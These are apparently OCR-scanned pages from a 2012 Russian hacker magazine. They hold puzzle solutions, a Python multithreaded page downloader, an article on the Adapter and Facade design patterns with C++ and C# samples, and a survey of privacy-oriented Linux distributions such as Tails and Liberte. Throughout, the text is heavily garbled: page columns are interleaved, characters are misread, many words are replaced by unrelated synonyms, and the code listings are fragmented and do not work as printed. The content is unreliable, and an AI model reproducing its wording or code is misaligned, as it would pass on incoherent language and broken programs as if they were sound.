Ждем неко тор ое время, п ока поверхностьлампочки нагреется. Выключаем э т у лампочку. Включаем следующий отключатель да пошли на другую колтун нат у смотреть на лампочки.

файлов значения отнюдь не имеют. Для реализации многопоточности использо вать нате сортировка касательно дн у с стандартных библиотек thгeadiпg , eveпtlet, geveпt,

Twisted

другими словами любую другую з нате комую тебе библио ­

Итого имеем: следовать ту лампочку, которая горит, отвечает всего лишь что такое?

привнесенный рубильник !второй]. Трогаем выключен ны е лампоч­ ки. Теплая лам поч ка включается со п омощью первого выключат еля .

теку.

А та, которая неграмотный г что до рит равным образом хо л об дная , - со вспоможение ю третьего.

РЕШЕНИЕ Я отнюдь не стал в отдельности держать фасон равным образом реализовал скрипт не без; использо на а­

УСЛОВИЕ

нием осанка дартн ой thгeadiпg:

В одной бутылке литр вина, на др угой литр воды. Из первой нет слов вторую перелили ложку провинность , а по прошествии времени изо дальнейший во п ервую перелили ложку

import import import import

получившейся смеси. Чего тепер ь больше: воды на бутылке не без; вином

sys threading Queue urllib2

или — или провинность на бутылке не без; водой? Вино равно вод у далеко не перемешивали.

РЕШЕНИЕ Для большей наглядности возьмем ложку вмещающий

#

Класс

потока,

скачивающий

страницу

class DownloadThread(threading . Thread): def run(self): #

Прописываем хидеры пользу кого

headers

=

I

=

000

мл

преступление

0еее мл воды

+

0ее мл проступок

I

бутылка:

000

II

бутылка:

0еее мл воды

мл

источник

+ 0ее мл смеси + 0ее мл причина -

0еемл смеси

страницы

urllib2.Request(urlsPool .get(),None,headers)

Пишем во индивидуальный обложка

Выдаем справку,

После второго переливания:

б.е)' }

logfile.write(urllib2.urlopen(req).read()) logfile . close() #

П о­

{ 'User-Agent' :

Запрашиваем предмет

req #

бутылка:

п бутылка:

запроса

'Мozilla /4 . 0 (compatiЫe; МSIE 0.0; Windows NT while urlsPool.qsize() > е : logfile=open(str(urlsPool.qsize()), ' w' )

#

000 мл.

сле первого переливания имеем:

коли скрипт запущен безо аргументов

П олучается, ч так во смеси 00 частей воды да 0 пакет корень зла иначе же 100/11 мл источник равным образом 0000/11 мл воды . С учетом сего перепишем послед­

нее слово !позволю себя убрат ь «МЛ» в целях большей компак т­ ности ]:

I

бутылка:

if len(sys.argv) < 0: print 'Usage : downloader.py [-n <number >] FILE \ n\ "- n <number>" - number of threads (default 00)' sys.exit( 0)

п бутылка:

I

бутылка:

#

II

бутылка:

Обрабатываем статочный мотив со

численностью nотоков

if len(sys.argv)==4 and sys.argv[ 0] threads int(sys.argv[ 0]) else : threads 10

==

(9ее (1еее

+ 000/ 01) источник + 0000/ 01 воды - 0000/ 01) воды+ (1ее - 00/ 01)

первопричина

П осчитаем дроби:

009,09 909,09

корень зла

причина

+ 00,91 + 00,91

воды

воды

'-n ' : Как видно, сбор на бу сторона ках оди н ако вая ! Но зто позволяется бы ло понять да несравнимо не задавайся : подумай, опять-таки количество жи д кос т равным образом на бу территория ках в итоге остался одинаковым - в отношении дин литр, а значит, равно самочки смеси

должны присутствовать одинаковыми. ::Х:

ХАКЕР

03 /158/ 0012

099


КОДИНГ

МЕНЯЕМ

ИНТЕРФЕЙСЫ КЛАССОВ БЕЗ УЩЕРБА ДЛЯ ЗДОРОВЬЯ

deeonis [deeonislagmail.com[ ·

а во ай представ им, ч т по отношению серия планирование отступать да мы не без; тобой написали

неведомый парсер, какой-никакой собирает опре д е л е нн ую инфор­ мацию со нужных сайтов. Дляп арсинга НТМL- стра н равным образом ц мы использовали стороннюю библиотеку, ко в таком случае раиса между тем что касается тл ично справлялась со своими задачами. Но умереть и отнюдь не встать т п рошло некоторое время, и из т арый заказчик, про которого ты да я соз д аль н а ш чуд об -п ро д укт, ре ­

шил напомни т ь об себя да в области п росил до самого бавить парочку-другую н что до ваша милость х функций . Мы вместе с задором взялись следовать работу, однако дословно одновременно по­ няли, почто библиотечка про разбора НТ М L- ко д а еще д ав хотя усище т аре л а и неграмотный поддерживается. Зато на открытом доступе питаться своего рода от кучей свистелок равным образом блестяшек, который-нибудь для тому но работает быстрее да не без; т а­ бильнее. Н относительно вкушать одна проблема- ан т ерфейсы у классо на нов ой

Разработка да подпора большинства систем

библиотеки п ол н остью отличаю т ся с тех, которые м ы использо­ вали ранее. Более того, кое-какие методы из та рого НТМL-дв ижка

подобает во протекание многих лет. Кодовая фундамент

малограмотный имеют анало г ов на новом. Нет, совершить ч т по части -т что до п одобное можно,

растет что получи и распишись дрожжах, а взаимосвязи в среде

побить итог их работы. Всё сие в на об дит для мысль, ч т насчёт

компонентами программнога обеспечения

прибавить способности у новы х фич если т малограмотный та ко п росто, наравне держи м сие показа­

становятся всё сложнее да изощреннее. Зачастую при обновлении отдельных участков стих на пороге

программистами встает положение рефакторинга всего проекта сплошь . Для того ради этого избежать, создан паттерн « Адаптер», насчёт котором мы нынче да поговорим .

000

так чтобы сего н ужно призвать порядочно функций равно по чести

сохач вначале. Однако, круглым счетом равно как автор п роек т ирова ли наше прил ожение в 00 -стиле, нам в поддержка придет паттерн <<Ада пт ер», ко т орый избавит нас ото переписывания кучи старого стих .

ПАТТЕРН «АДАПТЕР» Чтобы раскусить , равно как работает свой благодетель ный паттерн, до­

статочно препроводить какой- н ибуд ь п ерехо существование к, например, для элек т ро пр иборов с С Ш А, кой п вал во относительно ля е т засадить ш татовскую вилку во е вр опейскую розетку . Пр ограммный трансформатор д е ла ет при-

ХАКЕР

03/158/2012


Паттерны «Адаптер>> равным образом «Фасад>>

мерно ведь а . А когда конкретнее, ведь симпатия преобразует сам в области себе интерфейс

puЬlic

IHTMLParser

вызова на непохожий . Единственная его мета - выработать так, чтобы клиент неграмотный заметил, сколько спирт обращается вовсе для дру г ой библиоте­ ке, равным образом тем самым избежать трудоемкой равно во какой-то степени хоть

private : ModernHTMLParser &m_modernParser;

опасной процедуры изменения кода.

puЫic :

Д ля альфа и омега ну-кася взглянем бери то, что-нибудь у н дока было раньше.

HTMLAdapter(Modern HTMLParser &parser) { m_modernParser=parser;

Наша програ~а на первой версии (используется устаревшая библиоте ко а с целью парсинга

0/

HTML)

}

Интерфейс парсера

char * get Tags() {

01 . ..

class IHTMLParser

m_modern Parser.getHtmlTags();

{

01 . .•

01 char * getтags ()

};

е·

'

01 ...

/1

}

/1

Класс,

р еализующий

class HTMLP arse r :

да нт ерфейс

puЫic

/ / Кл ие нт ский код ModernHTMLParser &modernParser=new ModernHTM LParser(); I HTMLParser * parser=new HTMLAdapter(modernP arser); parser->getTags();

IHTMLP arser

01 char * getTags() // Р еализация

метояа

Клиентский адрес отнюдь не претерпит почти что никаких изменений.

};

Н у, нешто ась? придется учредить конструкт класса HT M L Adapteг да пере­

01 } // Клиентский код IHTMLParser *parser parser->getTags();

отдать ему во качестве параметра ссылку возьми Моdегп НТ МL Р агsег. Используя композицию,тоестьпередаваяобъектадаптируемого класса соответственно ссылке, да мы от тобой повышаем общую недогматичность системы .

new HTM LParser();

В общем случае адрес адаптера может пересмотреть результа­ ты, получаемые ото адаnтируемого класса. Так, если, например, ме­

Как ты да я видим, шелковица всё кончено просто. Е сть некоторый ранг

тод getТagsll класса НТМ L Рагsег возвращает конгломерат НТ М L-тегов,

Н Т МL Р агsег, реал равно зующий соответст во ующий интерфейс. Клиент­

используемых на разметке страницы, а ме т од get Htm iTagsl l класса

ский шифр создает объек т, ко т орый поддерживает э т об т ан т ерфейс,

ModeгnHTMLPaгseг возвращаеттоже самое, да во виде вектора, так

а спустя время обращается ко его разнообразным методам. Но нынче

совершение метода getТags на HTM L Adapteг создаст конгломерат для осно­

у нас поглощать ModeгnHTMLPaгseг, какой-никакой никоим образом далеко не поддерживает

ве полученного с новой библиотеки вектора.

IHTM L Paгseг. Д ля того ради наладить текущий недочет, пишущий сии строки создадим класс, который-нибудь полноте защищать IHTMLPaгseг, рядом этом деле г и­

Изменение результатов работы адаптируемого класса

руя совершение его методов н овой библиотеке . Этот небывалый сословие

class HTMLAdapter (Moder nHTMLP ar ser &parser): puЫic I HTMLParser

истанет а д а п тером.

Адаптер в целях

ModernHTMLParser class ModernHTML Parser

private : ModernHTMLParser &m_modern Parser; puЫic :

HTMLAdapter(ModernHTMLP arser &parser) { m_moder nP arser=parser;

01 std ::vect or <char *> getHtmlT ag s ();

01 . . .

char *

01

Адаптер,

р еализующий

I HTMLPa r ser class HTMLAaa pt er (Mode rnHTMLP arser &pa rs er):

CLIENT

getтags ()

0/ .. .

равным образом нтерфейс

vectorOfTa gs

m_modern Parser.getHt mlTags();

TARGET

0

+request!l

r_

0

Adaptee -> specificReqest []

0

ADAPTER

0

+request(]

0------

-

«ad aptee»

.. ADAPTEE

specificReqest 01

Д да аграмма классов nаттерна « Адаnтер »

ХАКЕР

03/158/ 0012

001


КОДИНГ

// Преобразуем градиент во массив return vector2array(vectorOfTags);

char * getTags() { // Тут всё проще, таково равно как я наследуем методика getНtmlTags (),

};

/1

IJ

vectorOfTags=getHtmlTags();

Jl

так дозволяется вытребовать его наnрямую

Преобразуем ве ко тор на конгломерат

return vector2array(vectorOfTags);

};

Е сли твоя милость систематически заглядыв аеш ь во рубрику << Кодинг », то, на­

верное, помнишь др угой сходный паттер н, а прямо « Де коратор>>.

Jl ...

На главнейший лицезрение воистину может показаться, что такое? в области сути эти двушничек шаблона объектно - ориентированного пр ограммирования Конечно, используя юниорат награду композиции, наша сестра теря­

идентичны. Но в самом дел е паттерн «А даптер >> служит ради пре­

образования одного ан т ерфейса вызова на другой, во ведь промежуток времени в духе

ем некотор ую покладистость равно ограничиваем себя всего только одним классом

« Декоратор >> призван мо ди фицировать результаты, выдаваемые

НТМLРагsег, а заместо получаем победа во производительности .

методами поддерживаемых классов.

Если бы схема создавала мн ожес тво объек т ов HTML Adapteг и насыщенно работала вместе с его методами, то, используя звукосниматель объ­

АДАПТЕРЫ КЛАССОВ И ОБЪЕКТОВ

ектов, я бы тратили лишнюю парамнезия да теряли пора близ вызове

Выше я рассмотрели что-то около называемый а дап тер объектов, ко т орый

его методов да сохранении инкапсулированного НТМLРа гsег. С др у­

ада пти рует интерфейс п у т ем композиции соответствующего объ­

нееврей сто роны, коли бы у нате не без; бы л н екий группа НТМLРагsег 0, какой-никакой

екта равно передачи ему н полоз ны х вызовов. Н в отношении кушать пока что единолично личина такого

бы и реализовывал интерфейс IH TMLPa гseг, нам пришлось бы

паттерна-это а даптер ко ла ссов. В медаль через а дапт фигляр объектов,

nисать в целях него новоизобретённый код.

звукосниматель классов испол ь зует множественное наследова н ие, что такое?

маленько у прощает его реализацию равным образом уско ряет работу.

« ФАСАД » Теперь , от случая к случаю наш брат недурственно разобрались во паттерне «А даптер >>, можно предпринимать другим обычай ом объектно-ориентированного

Адаnтер классов

class HTMLAdapter (): puЫic HTMLParser,

программирования подо названием «Фаса д >>. Технически « Фасад >> puЬlic

ModernHTMLParser

чуть-чуть нежели отличается ото «А даптера >> . Чтобы во этом убедиться, давай взглянем получи и распишись код.

puЫic : Паттерн

using

Syз~em ;

namespace

«Фасад>>

class SystemClassl { void methodA() ;

Adap~e~

01 .. .

{

} class MainApp class SystemClass2

static void Main () (

void methodB();

01 Create adapter and place а request Target ~arget=new Adapter () ; target .Request (); 11 Wнt for user Console . Read ();

01 . ..

class

SystemClassЗ

{ void methodC ();

/J . ..

01 "Tarqet" class Target

class Facade (SystemClassl &scl, SystemClass2 &sc2, SystemClassЗ &sсЗ)

( puЬlic

virtual void Request ()

( Console . 0Jп.teLine ( "Called

Target

Requeзt()") ;

01 "lldapter"

private : SystemClassl &m_scl; SystemClass2 &m_sc2; SystemClassЗ &m_scЗ;

class Adapter : Target puЬlic :

(

private Adaptee adaptee=new Adaptee (); puЬlic

override void Request ( )

Facade(SystemClassl &scl , SystemClass2 &sc2, SystemClassЗ

(

01 PossiЫy do sоме othm· м:~rk 11 and then call Spec~f~cRequest adaptee . SpecificRequest ( );

01 "Addptee"

m_s cl m_sc2

scl; sc2;

m_ scз

sсЗ;

&sсЗ)

void method()

{ Пример стих nаттерна « Адаnтер» сверху С#

002

m_scl. methodA ();

ХАКЕР

03/158/2012


П а тт ер н ы <<А д а пт е р » да << Ф аса д »

All the complexity of this entire sub-system is encapsulated in а single wrapper class and it's simple interface ------------------т------------------

SubsystemOne SubsystemTwoWгappeг

+primeTheDirectivell

SubsystemThгee

/

Holodeck

PlasmaConduit

WагрСоге

JeffeгiesTube

0 DilithiumChambeг

Weapon

t Тгаnsрогtег

TuгboLift

PhaseгBack

PhotonToгpedo

Диаграмма классов паттерна ссФасад•>

m_sc2 . met hodB() ; m_sc 0. meth odC () ;

стему . <<Фасад>> а инкапсупирует всегда сии образ действий во одном своем методе, почто сво д ит всю процедуру ко вызову одной-единственной функции равно тем самым упрощает клиенту общежитие . Е сли прово д ить

'

аналогию со П К , так <<Фаса д >> - сие застежка включения ноу т бука.

}

Более того, п а тт ерн <<Фаса д >> позволяет клиенту обращаться Класс

Fa cade,

эдак а во вкусе да HT M L A d a p te г, п ринимае т во каче ­

для любому классу сис т емы для п рямую, получи низком уров н е, благода­

стве батман р аметров своего конструктора ссылки бери объекты. Только,

ря чему сохраняется все пластика равным образом мощь сих классо во . О д доставать

на награда через <<Адаптера>>, сих ссылок неско ль ко . Д алее <<Фасад>>

ко, буде заказчик знает токмо интерфейс <<Фасада>>, во будущем

определяе т н есколько ме т об д касательно на , ко т орые обращаются для функциям

наш брат можем видоизменять систему классов, обслуживаемых

инкапсулиро на анных объекто на . Всё нетрудно равно оче н ь по-видимому получи и распишись п ат­

Facade,

терн <<А д аптер>> . Н касательно ц ели у сих д вух ш абло н ов соверше нн в отношении разные.

полезна.

равным образом около этом далеко не разменивать шифр клиента . Такая разрозненность адски

Если НТ М LР а г sе г п р е д назна ч е н интересах п ри на е д е н ия од н ого интерфей­ са для другому, ведь

Facade

у п ро щ ает интерфейс доступа для далеко не которой

ЗАКЛЮЧЕНИЕ

системе классов . В около во еденном перед этим примере автор инка псулируем

Мы узнали что касается д вух новых паттернах: <<А д аптере>> равным образом <<Фаса -

мгновенно до некоторой степени объектов, принадлежащих для разным типам да со­

де>>. Первый позволяет несложно вызвать да н терфейс

ставляющих невесть какой подборка для л ассов, тот или другой служит для того выполне ­

одного класса для интерфейсу д руго г по части к быстрой адаптации

ния каких-либо опре д е л енных д ейс т вий . Ч тоб ы выгодно отличается себя сие

клиентского стих ко новым компоне н тама системы. Ш аблон

п ре д ста на равным образом т ь, д остаточно вс п ом н ить ста р ый д обрый П К не без; систем­

00- п ро г рамми р ования <<Фаса д >>, аспидски п охожий н а <<А д а п тер>>,

ным блоком, монитором, колесо н ками да прочей периферией. Дл моя особа

служит ради вполне второй цели - у п ро щ ения д оступа

запуска сего компьютера нам нуж н об нажат ь кнопку питания возьми си­

для определенным интерфейсам.

стемном блоке, включит ь монитор, колонки равным образом т. д., ведь кушать затребовать

избыток функций классов, которые купно образуют некую си-

ХАКЕР

03/158/2012

В мире объектного кодингасуществует снова мно г относительно разнообраз ­ ных паттернов, об которых моя персона расскажу во будущем. :х:

003


UNIXOID

Женюша Зобнин [ e xe cЬit. r u l

изоляцию ИЗ ЧЕГО СОСТОЯТ БЕЗОПАСНЫЕ LINUХ­ ДИСТРИБУТИВЫ Когда слово заходит об создании операционки, способной покрыть неназванность пребывания

-

Разработчики безопасных дис т рибутивов избегают использовать

ТгuеСгур t, где-то наравне

его разработка ведется держи ба з е за для рытой модели, из-за зачем проложить

исчерпывающий аудит кода не по-под силу .

Во срок каждой

на Сети, сохранность сохраненных в диске

загрузки Наvеп

данных равно выдать другие ресурсы

« пожилой •)

проверяет

защиты , дистрибутивастроители оказываются

дистрибутива в дня х, прошедших

со момента

в отключка плодовитыми возьми идеи

установки .

равным образом неординарные решения парнями . Эти м

Разработчики не рекомендуют

пускать в ход

разработкам, простым да сложным , гениальным

дистрибутив,

равным образом спорным, равно посвящена данная статья.

ДОСТИГ

детства которого

000 ДНеЙ .

l:iфl!lilillli

д истрибу т равным образом вас по части т во злом щ иков , касательно д так вр еме нн в отношении

М н огие хакеры, считаю щ ие себя эксперта-

п вал во по части л моя особа автор сохра н ит ь пенис обство да п ростоту на ис­

ми на без п асности лишь равно на ся, во свое момент

п насчёт л ьзова н ии . Ч тобы далеко не ради п у та т ь чита т е л я, автор

брались вслед за созда н ие п о-нас т оящему защи щ ен ­

разбил э т равно т ех н ологии возьми пяточек групп :

ны х да предлагающи х п олную незнакомец н волос ОС.

заплатки , по мнению умолчанию наличность в отношении жен н ые нате кер ­

которые действи т ельно показали вселенная у, для зачем

нел.

способны. Не будем д елать н авевающий тоску

цен т рируемся нате самых гла вн ых т ех н ологиях в их арсенале , ко т орые н а д ежно из-за щ равным образом щ ают сии

да из-за п ут ы ван равным образом моя персона т ех, ко т насчёт пытает не без; автор этих строк е го возьми й ти .

Защита д а н ны х . Описани е со объединение со обов , со п по части ­

Д есктоп. Н абор д осту п н ы х п риложений, а вдобавок методики , п рименяемые в целях защи т ы

Я д ерные д е л а, а точнеепатчии крата л ичные

Многие изо них потер п е л да неудача , за всем тем безграмотный ­

установленный сообщение д ист р иб у ти на по отношению во , а скон ­

зуе пишущий сии строки х дл мы обез лич равно во а н равным образом автор пользов а т е ля

с пос т оронних наблю д ате л ей .

Различные ан т ересн ы е фу-ты ш ки. Итак, окунемся во круг сила а н ои д а л ьной

мо щь ю которых дости г ает со моя особа безопасност ь

секьюрности равно рассмот р им сле д ую щ ие д ис­

сохра н е н утнапиштим сверху д иске /флешке да н фо р ма ц ии .

т рибутивы : Ubuпt u Pг i v acy

Анонимиза ц ия .Н абортехноло г ий,испол ь-

Haven

P гoject,

Tails

Re mi x, Pгi v a tix, The Li nux.

равно L ibeгte

ХАКЕР

03/158/20 02


Свобода после изоляцию

ЯДРЕНЫЙ ТУКС

дога приложения для отдельной виртуальной

Чтобы выработать туке всамделишно безопас­

машине. Смысл такого перегруза заключается

утнапиштим ОСью, безвыгодный привыкать не принимая во внимание допиливания ядра,

во тотальном разделении приложений, приближенно ась?

а точнее, его патчин га про повышения общей

инда если бы взломщику каким-то чудесным образом удастся

стойкости ОС. Вотан с традиционных методов,

увеличить домашние услуги предварительно суперпользо­

используемых чтобы преимущества этой цели,

вателя равно следовать гр узить на сердечник частный код, уязвимым

заключается во наложении нате опора патч ей

будеттолько одно приложен равным образом е, приближенно равно как каждая

проекта gгsec:uгity. Они обеспечивают защиту

виртуальная механизм работает перед управлени­

ото возможных вторжений со через множе­

ем собственного ядра. Такой зубодробитель­

ства методов, средь которых табу перехода

ный приём защиты используется на дистри­

по части ссылкам, невыгодный принадлежащим пользовате­

бутиве

лю, интердикт чтения

была посвящена отдельная часть !« Младенец

dmesg

к всех, кто именно отнюдь не име­

ет прав гооt, дополнительные ограничения для того

QubesOS,

которому на нашем журнале

вместе с с лица убийцы>>,

][_07_2010].

сhгооt-приложений, приказ чтения

/ргос, перемешивание адресного пространства и стека ядра равно многое другое. Мы уж писали

Процесс загрузки

Liberte

НЕДОСЯГАЕМЫЕ БАЙТЫ

в рассуждении gгsecuгity [статья <<Термоя дерный синтез»,

Защищенность личных данных пользовате­

опубликова нн ая на октябрьском номере после

ля- сие вторая важная качество лю-

во какой угодно время позволено удалить, во результате

разбитое безопасной ОС. Многие дистрибутивы,

что такое? строй вернется ко исходному послеуста­

предназначенные про анонимизации юзера

новочному состоянию.

0010

год], круглым счетом ась? безвыгодный буду повторяться. Обычно вообще от gгsecuгity во систему

данных пользоват е ля представление растет, только его

устанавливается единаче равным образом РаХ, какой ограни­

во Сети, обеспечивают ее из через спосо-

чивает теледоступ для страницам памяти процессов

ба, кто оператор с известного анекдота

краснолесье инструментов для того со оздания зашифрован­

!например, делает членик данных недоступ­

назвал бы ампутацией нен у жного органа .

ны х файлов равным образом каталогов . Чаще общем для того сего

ным к исполнения], что такое? позволяет предохранить

Такие дистрибутивы распространяются во виде

системные процессы через многих ошибок пере­

LiveCD,

который, пусть даже буду чи установленным

Многие системы в свой черед включают во себя возьми ­

исп по части льзуется именитый инстр у фараон ТгuеСгурt с удобным графическим интерфейсом. Напри­

полнения буфера. Этот подступ используется

в флешку, сохраняет целое способности пользова­

мер, спирт входит во Наvеп l www.haven-pгoject . oгg ].

во Libeгte Liпux, кто построен в основе

телец бери RАМ-диске , уничтожаемом вот миг

Однако кое-когда разработчики дистрибутивов

ядра Haгdened

перезагрузки.Спосо~ конечно, действенный,

прибегают для сильнее изощренным решени-

однако сверх меры дубовый .

ям. Дистрибутив Pгivatix охватывает на себя

Gentoo, уж

включающему

во себя пара патча . Другой подходец заключается во использова­

нии системы

SELinux

иначе говоря АррАгmог солидарно

Более небезынтересный вариация состоит вис­ пользовании шифрованного хранилища

инстр у легавый шифрования съемных носителей UsbCгyptFoгmat равным образом утилиту про резервного

от двумя упомянутыми прежде патчами !или

в базе ТгuеСгурt или — или LUKS/dm-cгypt, которое

копирования шифрованных томов CгyptBackup

за них, да сие глупость] . Эти системы

расшифровывается кайфовый срок загрузки позднее

собственной разработки. В плане поддержки

принудительного контроля доступа позволя­

ввода пароля. Благодаря современным на­

прозрачного шифрования данных особенно

надстройка начинать приложения на изолированном

работкам осуществить такую систему куда

окружении, эдак в чем дело? скачок !читай взлом] одного

просто, тем паче в чем дело? симпатия во готовом виде

примечателен дистрибутив Ubuntu Pгivacy Remix lwww. pг i vacy-cd . oгg ], ремилитаризованный в целях

изо них никак не повлечет после собою проблем на других.

присутствует на дистрибутивах

работы на локальном окружении, лишенный чего доступа

Подход не без; использованием АррАгmог реализо­

да многих других . Она как и нет переводу во дис­

ко бредень lзадействование LAN/WLAN/Biuetooth

ван на операционке

трибутивах

запрещено]. В его арсенале есть фронт-энд

явлениям ее создателей, гарантирует полную

TailsiThe Amnesiac lncognito Live System] равным образом Libeгte Linux, притом на последнем

изоляцию приложений кореш ото друга.

во качестве хранилища используется крипто­

руемый от

ванный вид диска, находящийся во отдель­

кодирование , организовывать подписи равным образом генери­

ном каталоге. По мере ежедневник на него личных

ровать ключи от через контекстного разблюдник

quantOS,

которая, согласно за­

Еще паче полный странствие заключается в применении гипервизоров на запуска каж-

Ubuntu,

Fedoгa

собственной разработки для того

Nautilus

GnuPG,

интегри­

равным образом позволяющий осуществлять

lв Наvеп те но функции выполняет снасть

Seahoгse]. Также дистрибутив использует так называемые расширенные ТгuеСгурt-тома

lв собственной терминологии авторов проекта] для сохранения данных, накопленных пользо­

вателем закачаешься пора работы !например, настройки приложений, тезаурус

OpenOffice,

ключи GпuPG

равным образом т. д.]. Всё сие работает светло равным образом малограмотный требует каких-либо дополнительных действий со сто­ роны пользователя.

Кроме систем шифрования, дистрибути­

ваша сестра могут переключать на себя вспомогательные инструменты, которые помогают хоронить

да отстаивать информацию с посторонних. На­

пример, на ассортимент приложений Tails входит ин­ струмент МАТ l mat.boum . oгg ], который-нибудь удаляет метаданные иэ файлов различных форматов

!изображений, документов да т. д.], про того чтобы снять иэ них что бог на душу положит называние об ав­

_

Remov.able media can Ье disco м ected now. Before dtsconnecting. make sure that any 0/0 activity on the device has stopped.

торе.

Haven

имеет сызнова паче интересные воз­

можности, например, спирт позволяет шифровать содержимое женские груди обмена на единолично клик, что можно пускать в дело чтобы быстрой передачи

Liberte Linux собственной nереоной

ХАКЕР

03/158/ 0012

малого объема данных [скопировал строку-

005


UNIXOID

Congratulations. Your browser is configured to use Tor. Pluse ntlar to the ~ COf" l'urther inform.~tion aЬout using anonymously.

Тог safaly.

You &re now

fnМ

to Ьrowse the ln temet

.....

-·-;",..-;.., _.,. _ _ ••••a.u.m.11

__ . ~

....

liiiЬ

...

::".:'~:.:"..:·~:" ~

-.II~~.....W...-..L!Iai..МU....J.J.iU8~~~11111.1W.

floiSI8ofll~llllrllo~ Doo .IIOitiaweWмe

0 ttrrl!w ' w--~

Рабочий верстак Haven 05

The Amnesiac lncognito Live System

нажал бери знамя на трее- вставил на письмо).

механизмы равно может соорудить его на случае сбоя alias

плане

Менеджер файлов

в соответствии с недосмотру разработчиков приложения.

всё, который лишь только дозволяется увидеть , таково что их

Nautilus,

втаскивающийся во оный

но дистрибутив, оснащен плагином , тот или другой

П оэтому на Libeгte

Linu x применяется

новый

Ta ils,

во какой-никакой разработчики пихают

неграмотный смущает немалый границы дистрибутива. На­

предназначен на << полного >> удаления файла

подход: совершенно входящие на дистриб утив сетевые

пример, во него входит графичный фронт-энд

вследствие контекстное меню. Перед удалением

приложения настраиваются нате работу чрез Тог

про Тог-клиента

обложка забивается случайными данными, круглым счетом что-то

lприложения, н е умеющие сидеть не без; прок-

Vidalia lwww.toгpгoject . oгg/ pгojects/vidalia l, тот или другой позволяет запускать/

ни безраздельно инструментарий восстановления данных

си, запускаются от через обертки toгify), а

удерживать Тог-демон, просматривать

отнюдь не сможет его найти.

брандмауер запрещает любые исходящие сое ­

величина прошедшего после Тог трафика,

динения. Та кая чертеж позволяет избежа ть что

мо н иторить ситуация д емо сверху равным образом т. д.

АНОНИМУСЫ ИДУТ

прибыль IР-адре са, т ак да установления внешних

Дистрибутив заключает во со ебя три расши­

Обеспечение анонимности пребыв ания

соединений на патрулирование Тог. Пр да этом разрешены

рения на браузера Fiгe fox, обеспечиваю суп е

во интернете-третья важная качество

только лишь со л е д ую щишки е типы внешних соединений:

надежность веб-серфинга: иррадиация

безопасного дистрибутива. Как равным образом во случае

DНСР-запросы да Тог-соединения судален ­

вместе с защитой данных, кой-какие дистрибутивы

ными НТТР IS)-портами;

получи веб-странице жаркий контент может статься

подходят для решению сего вопроса радикаль­

ответы нате piпg возле ограничении их количе ­

JavaScгipt-кoдa,

но. Например, Ubuпtu Pг ivacy

ства на секунду;

FiгeGPG l getfiгegpg.oгg ), позволяющий при­

никак не позволяет выбывать во Сеть , на томище числе

созда нны е пользователем VРN-соедине н ия;

видоизменять gрg-операции ко любым элеме нт ам

через

соедине ния , инициированныеспециаль­

веб-страницы, как например , подписывать тож

ным <<небезопасным браузером», каковой

зашифровывать оттененный отрывок текста;

удалена изо ядра Liпu x, чт об позволяет пре­

используется в целях регистрации на точках

иррадиация НТТР S Eveгywheгe lwww. eff.oгg/

вратить кусок пьютер на таковский бастион, какой-никакой

доступа.

Bluetooth

Remix

общий

да аж И К-модуля.

Поддержка общей сложности сего хозяйства спецухой

toгbuttoп, ко т орое блокирует содержащийся

Flash

равно т. д .; прибор

позволительно утилизировать в целях спокойной работы с важными секре тными данными .

Др угое дело- дистри бутивы, на которых из­

П ере дава емые объединение

DHCP материал

рядом этом

усиленно урезаются, а пересылка имени хоста,

равно

0Pv4LL блокируется.

Ч тобы обеспечит ь

исходно предусмотрена на озможность выхода

ARP

во Сеть . В них анонимност ь обеспечивается

неофициальность работы на локальных равным образом

Wi-Fi-

не без; через во всех отношениях известного инструмента Тог,

ceтяx, применяются рандомизаторы МАе­

какой пробрасывает конкатенация вследствие

адресов. В некоторых дистрибутивах они

много сетевых узло во , приблизительно что такое? его и концы в воду

дост у пны во виде опции, но на Lib eгte Liпux

оказываются славно спрятаны. В обычной

М АС-адрес генерируется подвижно закачаешься

ситуации Тог прикидывается стандартным

срок загрузки.

WINDOWS При установке в флешку дистрибутив

прокси, сверху работу от которым необходимо нас тро ить браузер да др угое ПО . Н об во вкусе состоять во ситуа-

ОБМАНКА ДЛЯ ~ ПОЛЬЗОБАТЕЛЕИ

Наvеnnроделываетодининтересныйтрюк

СУРОВОЕ ЛИЦО

со таблицей разделов, вследствие которому

ции, в отдельных случаях после Тог необ хо димо пробросить

Е сли апострофировать кого что касается поль зовательском интерфейсе

ординарный юзер

напрочь вс е сое динения , таково с тем ни по отношению дн что до

ди ст ри бутивов на анонимусов, ведь з десь однако

раскопать систему получи брелке. Дистрибутив создает

изо них н е утек л по части на Сеть обходным путем?

куда пр озаично: со тандартны е сре ды Gпome,

доnолнительный nустой раздел размером

Д истрибутивы

Ta ils

равным образом На vеп решают эту

проблему ахти просто: брандмауер пере­

LXD E либо — либо Fluxbox,

пакет стандартных прило­

жений почитай Fiгefox,

claws-mail,

AЬiwoгd равным образом т. д.,

000

Windows

неграмотный сможет пусть даже

Мб во начале адресного nространства,

а саму ОС да пользовательское прогалина

направляет постоянно соединения получай Тог-прокси,

да рыцарственный подбор ПО пользу кого ведения

размещает во следующих разделах .

за вычетом любые прибыль траф ика на отвод

скрытой деятельности . Он-то нас да интересует.

<< безвыгодный видип> прочие разделы, nозтому

<<анонимной сети». Однако создатель Libeгte

Н екоторые стандартные приложения ради

Windows

nользователю nокажется, аюшки? получай флешке

Liпu x предупреждает, ч т что касается экий подходец тео­

безопасного времяпрепровождения автор сих строк еще

синь порох нет, а ее кубатура составляет

ретически небезопасен, эдак по образу , инициируя

рассмотрели на предыдущих разделах, что касается дн ако

nущей убедительности во настоящий раздел позволительно

сцепление традиционным п у т ем, использование

получи них инвентарь интересных софтин, очевидно же,

нашвырять разных документов, а интересах отвлечения

получает информацию насчёт внешн ем IР-адресе

безграмотный заканчивается . Особенно любпытен на э т ом

внимания- nорнографических картинок.

006

000

ХАКЕР

Мб . Для

03/158/2012


Свобода вследствие изоляцию

https-eveгywhe гe l, принудительна переклю­ чающее браузер держи пользование протокола

Eile f.dit ~ew .Q.o jlookmarks Jools Y[indow J:!elp Г'

НТТРS, ежели сайт его поддерживает.

Те но расширения идут на комплекте со дис­

NewTab

Back

трибутивом Наvеп, все его оружейня ими не ограничивается. Здесь твоя милость найдешь бонус в виде пяти дополнительных полезных рас­

ширений: RefCoпtгol- производит спуфинг НТТР­ поля НТТР-геfеггег, скрывая отсайтов их

доноры, так поглощать сайты, со которых произошел

Congratulations. You are using Tor.

переход.

CookieSafe- позволяет обслуживать уста­ новкой кукисов во браузер пользу кого выбранных

Please refer to the Тог webs~e for

сайтов .

AdBiock Рlus-блокируетрекламу. RequestPolicy- позволяет открывать меж­

